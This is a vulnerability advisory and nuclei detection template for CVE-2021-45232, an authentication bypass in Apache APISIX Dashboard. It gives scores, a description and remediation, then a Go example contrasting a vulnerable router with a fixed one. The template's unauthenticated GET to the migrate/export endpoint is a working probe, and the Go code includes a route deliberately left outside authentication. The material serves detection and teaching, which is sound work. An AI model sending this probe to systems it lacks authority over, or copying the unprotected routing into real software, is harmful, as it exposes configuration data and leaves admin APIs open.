9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.6 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.972 High
EPSS
Percentile
99.8%
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`. While all APIs and authentication middleware are developed based on framework `droplet`, some APIs directly use the interface of framework `gin`, thus bypassing their authentication.
id: CVE-2021-45232

info:
  name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
  author: Mr-xn
  severity: critical
  description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`. While all APIs and authentication middleware are developed based on framework `droplet`, some APIs directly use the interface of framework `gin`, thus bypassing their authentication.
  impact: |
    An attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions.
  remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
  reference:
    - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
    - https://github.com/pingpongcult/CVE-2021-45232
    - https://github.com/advisories/GHSA-wcxq-f256-53xp
    - https://twitter.com/403Timeout/status/1475715079173976066
    - https://github.com/wuppp/cve-2021-45232-exp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45232
    cwe-id: CWE-306
    epss-score: 0.97202
    epss-percentile: 0.99785
    cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: apisix_dashboard
  tags: cve2021,cve,apache,unauth,apisix

http:
  - method: GET
    path:
      - "{{RootURL}}/apisix/admin/migrate/export"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Consumers":'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022014b3e39d19a975739d881f2d173c53050a43a15247eef092bc780b944e70f735022100c14dab355b7a0757b760b95b2a0499f2bc8027dacbc8d90a7416268f7b9337a7:922c64590222798bb761d5b6d8e72950
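The bug class the description names (an authentication middleware on one handler chain, a route registered on the other and so never passing through it) is illustrated below with Go's standard library instead of gin/droplet. This is an added example, not APISIX code and not part of the template above; the path, the bearer token and the handler bodies are constructed, and statusFor sends the same unauthenticated GET the template sends.

```go
package main

import (
	"net/http"
	"net/http/httptest"
)

// Constructed illustration of the CWE-306 pattern behind CVE-2021-45232, not APISIX
// code: auth middleware guards one handler chain, a route mounted elsewhere bypasses it.
const exportPath = "/apisix/admin/migrate/export"

// requireAuth stands in for the droplet-side authentication middleware.
func requireAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer valid-token" { // constructed token
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func exportHandler(w http.ResponseWriter, _ *http.Request) {
	w.Write([]byte(`{"Consumers":[],"Routes":[]}`)) // 200 plus the template's keyword
}

// vulnerableRouter: /routes is behind requireAuth, the export route is not.
func vulnerableRouter() http.Handler {
	outer := http.NewServeMux()
	outer.Handle("/apisix/admin/routes", requireAuth(http.HandlerFunc(exportHandler)))
	outer.HandleFunc(exportPath, exportHandler) // mounted outside the auth chain
	return outer
}

// fixedRouter wraps the whole /apisix/admin/ prefix, covering every handler under it.
func fixedRouter() http.Handler {
	api := http.NewServeMux()
	api.HandleFunc("/apisix/admin/routes", exportHandler)
	api.HandleFunc(exportPath, exportHandler)
	outer := http.NewServeMux()
	outer.Handle("/apisix/admin/", requireAuth(api))
	return outer
}

// statusFor sends an unauthenticated GET, as the nuclei template does.
func statusFor(h http.Handler, path string) int {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, path, nil))
	return rec.Code
}
```

The same probe against the two layouts returns 200 for vulnerableRouter and 401 for fixedRouter, which is exactly the distinction the template's status matcher relies on.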